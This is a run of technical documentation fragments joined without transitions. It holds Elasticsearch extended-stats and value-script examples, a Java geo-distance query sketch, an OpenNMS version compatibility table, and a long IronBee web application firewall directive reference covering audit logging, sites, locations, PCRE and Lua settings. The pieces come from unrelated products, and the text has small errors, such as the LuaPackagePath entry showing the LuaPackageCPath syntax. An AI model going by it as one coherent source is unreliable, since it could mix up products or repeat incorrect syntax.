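      = 86 + 2 * 7.180219742846005
      = 100.36043948569201

lower = avg - sigma * std_deviation
      = 86 - 2 * 7.180219742846005
      = 71.63956051430799
--------------------------------------------------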
.Standard Deviation and Bounds require normality
[NOTE]
=====
The standard deviation and its bounds are displayed by default, but they are not always applicable to all data-sets. Your data must be normally distributed for the metrics to make sense. The statistics behind standard deviations assume normally distributed data, so if your data is skewed heavily left or right, the values returned will be misleading.
=====

==== Script

Computing the grades stats based on a script:

[source,js]
--------------------------------------------------
{
    ...,

    "aggs" : {
        "grades_stats" : { "extended_stats" : { "script" : "doc['grade'].value" } }
    }
}
--------------------------------------------------

===== Value Script

It turned out that the exam was way above the level of the students and a grade correction needs to be applied. We can use a value script to get the new stats:

[source,js]
--------------------------------------------------
{
    "aggs" : {
        ...

        "aggs" : {
            "grades_stats" : {
                "extended_stats" : {
                    "field" : "grade",
                    "script" : "_value * correction",
                    "params" : {
                        "correction" : 1.2
                    }
                }
            }
        }
    }
}
--------------------------------------------------
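For instance, with a `correction` of `1.2`, a stored grade of `72` enters the computation as `86.4` (72 * 1.2), and all of the returned statistics then reflect the corrected values rather than the stored ones.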
[[java-query-dsl-geo-distance-query]]
==== Geo Distance Query

See {ref}/query-dsl-geo-distance-query.html[Geo Distance Query]

["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
include-tagged::{query-dsl-test}[geo_distance]
--------------------------------------------------
<1> field
<2> center point
<3> distance from center point
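The `include-tagged` macro above pulls the actual snippet from the Elasticsearch test sources, so it is not reproduced here. As a rough sketch of what such a query looks like when built with the Java API (the field name and coordinates are illustrative, not the tagged code):

["source","java"]
--------------------------------------------------
import org.elasticsearch.common.unit.DistanceUnit;
import org.elasticsearch.index.query.QueryBuilder;
import org.elasticsearch.index.query.QueryBuilders;

public class GeoDistanceQueryExample {
    public static void main(String[] args) {
        QueryBuilder qb = QueryBuilders
            .geoDistanceQuery("pin.location")            // field holding the geo point
            .point(40, -70)                              // center point (lat, lon)
            .distance(200, DistanceUnit.KILOMETERS);     // distance from the center point
        System.out.println(qb);                          // renders the query as JSON
    }
}
--------------------------------------------------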
[[compatibility_matrix]]
== Compatibility Matrix

[options="header, autowidth"]
|===
| OpenNMS | Java | PostgreSQL | Newts | Cassandra | Grafana | Elasticsearch | Kafka
| Horizon 19 | 8 | 9.2+ | [green]*Yes* | [green]*1.2, 2.X, 3.0* | [green]*3.X, 4.X* | [green]*2.X, 5.X* | [green]*0.10*
| Horizon 18 | 8 | 9.1+ | [green]*Yes* | [green]*1.2, 2.X, 3.0* | [green]*3.X, 4.X* | [green]*1.0* | [red]#No#
| Meridian 2016 | 8 | 9.1+ | [green]*Yes* | [green]*1.2, 2.X, 3.0* | [green]*3.X, 4.X* | [red]#No# | [red]#No#
| Horizon 17 | 8 | 9.1+ | [green]*Yes* | [green]*1.2, 2.X* | [green]*3.X, 4.X* | [red]#No# | [red]#No#
| Horizon 16 | 8 | 9.0+ | [red]#No# | [red]#No# | [green]*3.X, 4.X* | [red]#No# | [red]#No#
| Horizon 15 | 7 | 9.0+ | [red]#No# | [red]#No# | [red]#No# | [red]#No# | [red]#No#
| Meridian 2015 | 7 | 9.0+ | [red]#No# | [red]#No# | [red]#No# | [red]#No# | [red]#No#
|===

IronBee Configuration
---------------------

The IronBee configuration is loaded from the server container.
The syntax is similar to the Apache httpd server configuration.
The following rules apply:

* Escape sequences are as in JavaScript (section 7.8.4 in ECMA-262),
except within PCRE regular expression patterns, where PCRE escaping is
used
* Lines that begin with `#` are comments
* Lines are continued on the next line when `\` is the last character on
a line
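A small fragment illustrating the comment and line-continuation rules (the directive values are placeholders; `InitVar` is described later in this reference):

-----------------------------------------------
# Comments run from the hash mark to the end of the line
SensorId 13AABA8F-2575-4F93-83BF-C87C1E8EECCE

# A trailing backslash continues a directive on the next line
InitVar MY_SETTING \
        "some value"
-----------------------------------------------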
The IronBee configuration defines general configuration as well as site
and location mappings, which can each have their own configuration.

-----------------------------------------------
# Main Configuration
SensorId 13AABA8F-2575-4F93-83BF-C87C1E8EECCE
...

# Site1
<Site site1>
    SiteId 0B781B90-CE3B-470C-952C-5F2878EFFC05
    Hostname site1.example.com
    Service 10.0.1.100:80

    ...

    <Location /directory1>
        ...
    </Location>
</Site>

# Site2
<Site site2>
    SiteId 8B3BA3DE-2727-4737-9230-4A1D110E6C87
    Hostname site2.example.com
    Service 10.0.5.100:80

    ...
</Site>

# Default Site
<Site default>
    SiteId F89E43B3-EB96-44F0-BE1C-B4673B96DF9C
    Hostname *
    Service *:*

    ...
</Site>
-----------------------------------------------

The following is a reference for all IronBee directives, where the
context refers to the possible locations within the configuration file.

=== Action
[cols=">h,<9"]
|===============================================================================
|Description|Loads a rule that will always execute its actions and, in most contexts, enables the rule for execution in that context.
| Syntax|`Action id:1234 rev:1 phase:THE_PHASE ...`
| Default|None
| Context|Any
|Cardinality|0..n
| Module|rules
| Version|0.4
|===============================================================================

This is shorthand and functionally equivalent to a rule with no targets
and an operator that always returns true. Internally this is represented as
follows.

-----------------------------------------------
# These are equivalents
Rule NULL @nop "" ...
Action ...
-----------------------------------------------

[NOTE]
Loading a rule will, in most contexts, also enable the rule to be
executed in that context. However, the main configuration context is
special. Loading a rule in the main configuration context will _NOT_
enable the rule, but just load it into memory so that it can be shared
by other contexts. You must explicitly use `RuleEnable` in another
context to enable the rule.

=== AuditEngine
[cols=">h,<9"]
|===============================================================================
|Description|Configures the audit log engine.
| Syntax|`AuditEngine On \| Off \| RelevantOnly`
| Default|`RelevantOnly`
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.3
|===============================================================================

Setting `AuditEngine` to `RelevantOnly`, the default, does not log any
transactions in itself. Instead, further activity (e.g., a rule match)
is required for a transaction to be recorded. Setting `AuditEngine` to
`On` activates audit logging for *all transactions*, which may cause a
large amount of data to be logged.
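As a sketch of how this is typically combined with a sub-context (the path is hypothetical), a site could keep the default and record everything only for a sensitive location:

-----------------------------------------------
# Keep the default for the site as a whole
AuditEngine RelevantOnly

<Location /checkout>
    # Record every transaction under /checkout
    AuditEngine On
</Location>
-----------------------------------------------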
=== AuditLogBaseDir
[cols=">h,<9"]
|===============================================================================
|Description|Configures the directory where individual audit log entries will be stored. This also serves as the base directory for `AuditLogIndex` if it uses a relative path.
| Syntax|`AuditLogBaseDir <path>`
| Default|`"/var/log/ironbee"`
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.3
|===============================================================================

=== AuditLogDirMode
[cols=">h,<9"]
|===============================================================================
|Description|Configures the directory mode that will be used for new directories created during audit logging.
| Syntax|`AuditLogDirMode <octal-mode>`
| Default|`0700`
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.4
|===============================================================================

=== AuditLogFileMode
[cols=">h,<9"]
|===============================================================================
|Description|Configures the file mode that will be used when creating individual audit log files.
| Syntax|`AuditLogFileMode <octal-mode>`
| Default|`0600`
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.6
|===============================================================================

=== AuditLogIndex
[cols=">h,<9"]
|===============================================================================
|Description|Configures the location of the audit log index file.
| Syntax|`AuditLogIndex None\|<location>`
| Default|`ironbee-index.log`
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.4
|===============================================================================

Relative filenames are based off the `AuditLogBaseDir` directory and
specifying `None` disables the index file entirely.

=== AuditLogIndexFormat
[cols=">h,<9"]
|===============================================================================
|Description|Configures the format of the entries logged in the audit log index file.
| Syntax|`AuditLogIndexFormat <format>`
| Default|`%T %h %a %S %s %t %f`
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.4
|===============================================================================

* *%%* The percent sign
* *%a* Remote IP-address
* *%A* Local IP-address
* *%h* HTTP Hostname
* *%s* Site ID
* *%S* Sensor ID
* *%t* Transaction ID
* *%T* Transaction timestamp (YYYY-MM-DDTHH:MM:SS.ssss+/-ZZZZ)
* *%f* Audit log filename (relative to `AuditLogBaseDir`)
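For example, an index that records only the timestamp, hostname, remote address and audit log filename for each entry might be configured as follows (assuming the format string is quoted because it contains spaces):

----------------------------------
AuditLogIndexFormat "%T %h %a %f"
----------------------------------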
=== AuditLogParts
[cols=">h,<9"]
|===============================================================================
|Description|Configures which parts will be logged to the audit log.
| Syntax|`AuditLogParts <options>`
| Default|`default`
| Context|Any
|Cardinality|0..n
| Module|core
| Version|0.4
|===============================================================================

An audit log consists of many parts; `AuditLogParts` determines which
parts are recorded by default. The parts are inherited into child
contexts (Site, Location, etc). Specifying a part with the +/- operator will
add or remove the given part from the current set of parts. Specifying
the first option without +/- operators will cause all options to be
overridden and the list of options will be the only options set. Here is
what your configuration might look like:

-------------------------------------------------------------------
AuditLogParts minimal +request -requestBody +response -responseBody
-------------------------------------------------------------------

The above first resets the list of parts to *minimal*, adds all the
*request* parts except the *requestBody*, then adds all the *response*
parts except the *responseBody*.

Later, in a sub-context, you may wish to enable response body logging
and thus can just specify this part with the + operator:

----------------------
<Location /some/path>
    AuditLogParts +responseBody
</Location>
----------------------

If you already had response body logging enabled, but didn't want it any
more, you would write:

----------------------
<Location /some/path>
    AuditLogParts -responseBody
</Location>
----------------------

Audit Log Part Names:

* *header:* Audit Log header (required)
* *events:* List of events that triggered
* *requestMetadata:* Information about the request
* *requestHeaders:* Raw request headers
* *requestBody:* Raw request body
* *requestTrailers:* Raw request trailers
* *responseMetadata:* Information about the response
* *responseHeaders:* Raw response headers
* *responseBody:* Raw response body
* *responseTrailers:* Raw response trailers
* *debugFields:* Currently not implemented

Audit Log Part Group Names:

These are just aliases for multiple parts.

* *none:* Removes all parts
* *minimal:* Minimal parts (currently *header* and *events* parts)
* *default:* Default parts (currently *minimal* and request/response
parts without bodies)
* *request:* All request related parts
* *response:* All response related parts
* *debug:* All debug related parts
* *all:* All parts
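The group names combine with the `+`/`-` operators in the same way as individual parts. For example, to capture everything except the raw bodies:

--------------------------------------------
AuditLogParts all -requestBody -responseBody
--------------------------------------------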
=== AuditLogSubDirFormat
[cols=">h,<9"]
|===============================================================================
|Description|Configures the directory structure created under the `AuditLogBaseDir` directory. This is a +strftime(3)+ format string allowing the directory structure to be created based on date/time.
| Syntax|`AuditLogSubDirFormat <format>`
| Default|None
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.4
|===============================================================================

=== AuthBasicRealm
[cols=">h,<9"]
|===============================================================================
|Description|Configures the HTTP Basic Authentication realm used to challenge a user.
| Syntax|`AuthBasicRealm <realm-string>`
| Default|None
| Context|Any
|Cardinality|0..1
| Module|ident_authbasic
| Version|0.8
|===============================================================================

=== BlockingMethod
[cols=">h,<9"]
|===============================================================================
|Description|Configures the default blocking method.
| Syntax|`BlockingMethod status=<code> \| close`
| Default|None
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.8
|===============================================================================

=== DefaultBlockStatus
[cols=">h,<9"]
|===============================================================================
|Description|Configures the default HTTP status code used for blocking.
| Syntax|`DefaultBlockStatus <http-status-code>`
| Default|`403`
| Context|Any
|Cardinality|0..1
| Module|core
| Version|0.4
|===============================================================================

=== ErrorPageMap
[cols=">h,<9"]
|===============================================================================
|Description|Configures the error page contents for a given status code.
| Syntax|`ErrorPageMap <http-status-code> <file>`
| Default|None
| Context|Any
|Cardinality|0..n
| Module|error_page
| Version|0.9
|===============================================================================

When a transaction is blocked and an error page is generated, the status
code is mapped to a file whose contents are delivered as the response body.
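Taken together with `BlockingMethod` and `DefaultBlockStatus` above, a configuration might map a custom page onto the blocking status (the file path is illustrative):

-----------------------------------------------
# Respond with an HTTP status rather than closing the connection
BlockingMethod status=403
DefaultBlockStatus 403

# Serve this file as the body of the 403 response
ErrorPageMap 403 /usr/share/ironbee/error-pages/403.html
-----------------------------------------------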
\n\n=== FastAutomata\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads the automata for \"fast\" rules.\n| Syntax|`FastAutomata <automata-file>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|fast\n| Version|0.9\n|===============================================================================\n\n=== GeoIPDatabaseFile\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the geoip database file.\n| Syntax|`GeoIPDatabaseFile <geoip-db-file>`\n| Default|`\/usr\/share\/geoip\/GeoLiteCity.dat`\n| Context|Any\n|Cardinality|0..1\n| Module|geoip\n| Version|0.4\n|===============================================================================\n\n=== Hostname\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Maps hostnames to a Site.\n| Syntax|`Hostname <hostname>`\n| Default|`*` (any)\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThe `Hostname` directive establishes a mapping between a Site and one or\nmore hostnames. To map IP\/Port pairs to a Site, see the `Service`\ndirective.\n\nIn the simplest case, a site will occupy a single hostname:\n\n------------------------\nHostname www.ironbee.com\n------------------------\n\nMore often than not, however, several names will be used:\n\n------------------------\nHostname www.ironbee.com\nHostname ironbee.com\n------------------------\n\nWildcards are permitted when there are multiple names under a common\ndomain. Only one wildcard character per hostname is allowed and it must\ncurrently be on the left-hand side:\n\n----------------------\nHostname ironbee.com\nHostname *.ironbee.com\n----------------------\n\nFinally, to match any hostname (which you will need to do in default\nsites), use a single asterisk, which is the default if no `Hostname`\ndirective is specified for a site:\n\n----------\nHostname *\n----------\n\n=== IdentMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the ident mode.\n| Syntax|`IdentMode <mode>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident\n| Version|0.8\n|===============================================================================\n\n=== IdentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the ident type.\n| Syntax|`IdentType <type>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident\n| Version|0.8\n|===============================================================================\n\n=== Include\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Includes an external file into the configuration.\n| Syntax|`Include <file>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.5\n|===============================================================================\n\nAllows inclusion of another file into the current configuration file.\nThe following line will include the contents of the file `sites.conf`\ninto the configuration:\n\n-----------------------\nInclude conf\/sites.conf\n-----------------------\n\nThe file must exist and be accessible or an error is generated (use\n`IncludeIfExists` if this is not the case). If you specify a relative\npath, the location of the configuration file containing this directive\nwill be used to resolve it.\n\n=== IncludeIfExists\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Includes an external file into the configuration if it exists and is accessible.\n| Syntax|`IncludeIfExists <file>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.7\n|===============================================================================\n\nAs `Include`, but allows for optional inclusion without causing a\nconfiguration error if the file does not exist (as the `Include`\ndirective would).
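\n\nFor example, to pull in optional local overrides only when the file is present (the file name is illustrative):\n\n-----------------------------------------\nIncludeIfExists conf\/local-overrides.conf\n-----------------------------------------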
\n\n=== InitCollection\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Initializes a locally scoped collection data field for later use and optional persistence.\n| Syntax|`InitCollection <uri> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|initcollection, persist\n| Version|0.7\n|===============================================================================\n\nInitializes a collection from the initializer. The initializer format\ndepends on the implementation. There are multiple URI formats supported,\nwhich are described below.\n\nCore Functionality\n^^^^^^^^^^^^^^^^^^\n\n`vars: key1=val1 key2=val2 ... keyN=valN`\n\nThe `vars` URI allows initializing a collection of simple key\/value\npairs.\n\n----------------------------------------------------\nInitCollection MY_VARS vars: key1=value1 key2=value2\n----------------------------------------------------\n\n`json-file:\/\/\/path\/file.json [persist]`\n\nThe json-file URI allows loading a more complex collection from a JSON\nformatted file. If the optional persist parameter is specified, then\nany changes are persisted back to the file at the end of the\ntransaction. The next time the collection is initialized, it will be\nloaded from the persisted data.\n\n-----------------------------------------------------------------------------------------------\nInitCollection MY_JSON_COLLECTION json-file:\/\/\/tmp\/ironbee\/persist\/test1.json\nInitCollection MY_PERSISTED_JSON_COLLECTION json-file:\/\/\/tmp\/ironbee\/persist\/test2.json persist\n-----------------------------------------------------------------------------------------------\n\n=== InitVar\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Initializes a locally scoped variable data field for later use.\n| Syntax|`InitVar <name> <value>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================
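\n\nFor example (the name and value are illustrative):\n\n---------------------------\nInitVar MY_VAR \"some value\"\n---------------------------\n\nRules in that context can then reference `MY_VAR` like any other data field.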
\n\n=== InspectionEngineOptions\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures options for the inspection engine.\n| Syntax|`InspectionEngineOptions <options>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.7\n|===============================================================================\n\nThe inspection engine allows setting options; `InspectionEngineOptions`\ncontrols these options. The options are inherited into child contexts\n(Site, Location, etc). Specifying an option with a +\/- operator will add\nor remove the given option from the current set. Specifying the first\noption without a +\/- operator will cause all options to be overridden and\nthe list of options will be the only options set. Here is what your\nconfiguration might look like:\n\n-------------------------------------\nInspectionEngineOptions all -response\n-------------------------------------\n\nThe above first resets the inspection to *all*, then removes the\n*response* from being inspected.\n\nLater, in a sub-context, you may wish to enable response inspection\nand thus can just specify this option with the + operator:\n\n-------------------------------------\n<Location \/some\/path>\n    InspectionEngineOptions +response\n<\/Location>\n-------------------------------------\n\nIf you already had response inspection enabled, but no longer want it,\nyou would write:\n\n-------------------------------------\n<Location \/some\/other\/path>\n    InspectionEngineOptions -response\n<\/Location>\n-------------------------------------\n\nInspection Engine Options::\n* *requestHeader:* Inspect the HTTP request header (default)\n* *requestBody:* Inspect the HTTP request body\n* *responseHeader:* Inspect the HTTP response header\n* *responseBody:* Inspect the HTTP response body\n\nInspection Engine Option Group Names::\n* *none:* Removes all options\n* *default:* Default options (currently request header only)\n* *request:* All request related options\n* *response:* All response related options\n* *all:* All options\n\n=== LoadEudoxus\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads an external Eudoxus Automata into IronBee.\n| Syntax|`LoadEudoxus <name> <automata-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|ee\n| Version|0.7\n|===============================================================================\n\nThis directive will load an external eudoxus automata from\n`<automata-file>` into the engine with the given `<name>`. Once loaded,\nthe automata can then be used with the associated eudoxus rule operators\nsuch as the `ee_match_any` operator.\n\nThe eudoxus automata is a precompiled and optimized automata generated\nby the ac_generator and ec commands in the `automata\/bin` directory.\nCurrently, as of IronBee 0.7, a modified Aho-Corasick algorithm is\nimplemented which can handle very large external dictionaries. Refer to\nthe\nhttps:\/\/www.ironbee.com\/docs\/devexternal\/ironautomata.html[IronAutomata\nDocumentation] for more information.
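\n\nA minimal sketch (the automata name, file and rule are hypothetical, and it is assumed here that `ee_match_any` takes the loaded automata name as its parameter):\n\n--------------------------------------------------------------------\nLoadEudoxus bad_paths bad_paths.e\nRule REQUEST_URI @ee_match_any bad_paths id:1234 rev:1 phase:REQUEST\n--------------------------------------------------------------------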
This means that you should put the\nmost-specific location first, followed by the less specific ones.\n\n---------------------------------------\nInclude rules.conf\n\n<Site site1>\n Service *:80\n Service 10.0.1.2:443\n Hostname site1.example.com\n\n <Location \/prefix\/app1>\n RuleEnable all\n <\/Location>\n\n <Location \/prefix>\n RuleEnable tag:GenericRules\n <\/Location>\n<\/Site>\n---------------------------------------\n\n=== Log\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the log file.\n| Syntax|`Log <location>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== LogLevel\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the detail level of the entries recorded tothe log.\n| Syntax|`LogLevel <level>`\n| Default|`warning`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThe following log levels are supported (either numeric or text)::\n* * 0 - emergency* - system unusable\n* * 1 - alert* - crisis happened\n* * 2 - critical* - crisis coming\n* * 3 - error* - error occurred\n* * 4 - warning* - error likely to occur\n* * 5 - notice* - something unusual happened\n* * 6 - info* - informational messages\n* * 7 - debug* - debugging: transaction state changes\n* * 8 - debug2* - debugging: log of activities carried out\n* * 9 - debug3* - debugging: activities, with more detail\n* *10 - trace* - debugging: developer log messages\n\n=== LuaLoadModule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Load a Lua module (similar to LoadModule).\n| Syntax|`LuaLoadModule <lua-module-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n--------------------------------\nLuaLoadModule \"threat_level.lua\"\n--------------------------------\n\n=== LuaInclude\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Execute a Lua script as a configuration file.\n| Syntax|`LuaInclude <lua-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n----------------------\nLuaInclude \"rules.lua\"\n----------------------\n\n=== LuaPackageCPath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the Lua C package path.\n| Syntax|`LuaPackageCPath <lua-cpath>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n=== LuaPackagePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the Lua package path.\n| Syntax|`LuaPackageCPath <lua-cpath>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n=== 
\n\n=== LuaSet\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Set a named configuration parameter in a lua module.\n| Syntax|`LuaSet <lua-module-name> <name> <value>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n----------------------------------------------\nLuaLoadModule \"my-lua-module.lua\"\n...\nLuaSet \"my-lua-module.lua\" MY_VAR \"some value\"\n----------------------------------------------\n\n=== ModuleBasePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the base path where IronBee modules are loaded.\n| Syntax|`ModuleBasePath <path>`\n| Default|The `libexec` directory under the IronBee install prefix.\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== PcreDfaWorkspaceSize\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE DFA workspace size.\n| Syntax|`PcreDfaWorkspaceSize <size>`\n| Default|200\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreJitStackMax\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE JIT stack maximum size.\n| Syntax|`PcreJitStackMax <size>`\n| Default|0 (auto)\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreJitStackStart\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE JIT stack starting size.\n| Syntax|`PcreJitStackStart <size>`\n| Default|0 (auto)\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreMatchLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library match limit.\n| Syntax|`PcreMatchLimit <limit>`\n| Default|5000\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\nFrom the `pcreapi` manual: ``The match_limit field provides a means of\npreventing PCRE from using up a vast amount of resources when running\npatterns that are not going to match, but which have a very large number\nof possibilities in their search trees. The classic example is a pattern\nthat uses nested unlimited repeats.''\n\n=== PcreMatchLimitRecursion\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library match limit recursion.\n| Syntax|`PcreMatchLimitRecursion <limit>`\n| Default|5000\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\nFrom the `pcreapi` manual: ``The match_limit_recursion field is similar\nto match_limit, but instead of limiting the total number of times that\nmatch() is called, it limits the depth of recursion. 
The recursion depth\nis a smaller number than the total number of calls, because not all\ncalls to match() are recursive. This limit is of use only if it is set\nsmaller than match_limit.''\n\n=== PcreStudy\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE \"study\" option.\n| Syntax|`PcreStudy On \\| Off`\n| Default|On\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreUseJit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library to use the JIT.\n| Syntax|`PcreUseJit On \\| Off`\n| Default|On\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PersistenceMap\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Map a collection to a persistence store.\n| Syntax|`PersistenceMap <collection> <store> [key=value] [expire=value]`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|persistence_framework, persist\n| Version|0.7\n|===============================================================================\n\nSee: <<_persisting_collections>>\n\n=== PersistenceStore\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a persistence store.\n| Syntax|`PersistenceStore <name> <uri>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|persistence_framework, persist\n| Version|0.7\n|===============================================================================\n\nSee: <<_persisting_collections>>\n\n=== PredicateAssertValid\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Validate predicate, write a predicate report to file or stderr and abort on error.\n| Syntax|`PredicateAssertValid <file> \\| \"\"`\n| Default|\"\" (stderr)\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.8\n|===============================================================================\n\n=== PredicateDebugReport\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Write a predicate debug report to file or stderr.\n| Syntax|`PredicateDebugReport <file> \\| \"\"`\n| Default|\"\" (stderr)\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.8\n|===============================================================================\n\n=== PredicateDefine\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a predicate template.\n| Syntax|`PredicateDefine ...`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.9\n|===============================================================================\n\n=== PredicateTrace\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable predicate trace output to file or stderr.\n| Syntax|`PredicateTrace <file> \\| \"\"`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.9\n|===============================================================================
\n\n=== ProtectionEngineOptions\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures options for the protection engine.\n| Syntax|`ProtectionEngineOptions <options>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.8\n|===============================================================================\n\nThe protection engine allows setting options; `ProtectionEngineOptions`\ncontrols these options. The options are inherited into child contexts\n(Site, Location, etc). Specifying an option with a +\/- operator will add\nor remove the given option from the current set. Specifying the first\noption without a +\/- operator will cause all options to be overridden and\nthe list of options will be the only options set. Here is what your\nconfiguration might look like:\n\n----------------------------\nProtectionEngineOptions none\n----------------------------\n\nThe above resets the options to *none*.\n\nLater, in a sub-context, you may wish to enable blocking and thus can\njust specify this with the + operator:\n\n-----------------------------------------\n<Location \/some\/path>\n    ProtectionEngineOptions +blockingMode\n<\/Location>\n-----------------------------------------\n\nIf you already had blocking mode enabled, but did not want it any more,\nyou would write:\n\n-----------------------------------------\n<Location \/some\/other\/path>\n    ProtectionEngineOptions -blockingMode\n<\/Location>\n-----------------------------------------\n\nProtection Engine Options::\n* *blockingMode:* Control blocking actions.\n\nProtection Engine Option Group Names::\n* *none:* Removes all options\n* *default:* Default options (currently none)\n* *all:* All options\n\n=== RequestBodyBufferLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the request body buffer.\n| Syntax|`RequestBodyBufferLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== RequestBodyBufferLimitAction\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures what happens when the buffer is smaller than the request body.\n| Syntax|`RequestBodyBufferLimitAction FlushAll \\| FlushPartial`\n| Default|FlushPartial\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\nWhen `FlushAll` is configured, a transaction with a body larger than\nthe buffer will flush the existing buffer, sending it to the backend,\nthen continue to fill the buffer with the remaining data. With\n`FlushPartial` selected, the buffer will be used to keep as much data as\npossible, but any overflowing data will be flushed and sent to the\nbackend. Request headers will be sent before the first overflow batch.
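\n\nFor instance, to buffer request bodies and flush the whole buffer once it fills (the limit value is illustrative and the unit is not stated here; note that `RequestBuffering`, described below, must be enabled for the request body to be buffered):\n\n-------------------------------------\nRequestBuffering On\nRequestBodyBufferLimit 131072\nRequestBodyBufferLimitAction FlushAll\n-------------------------------------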
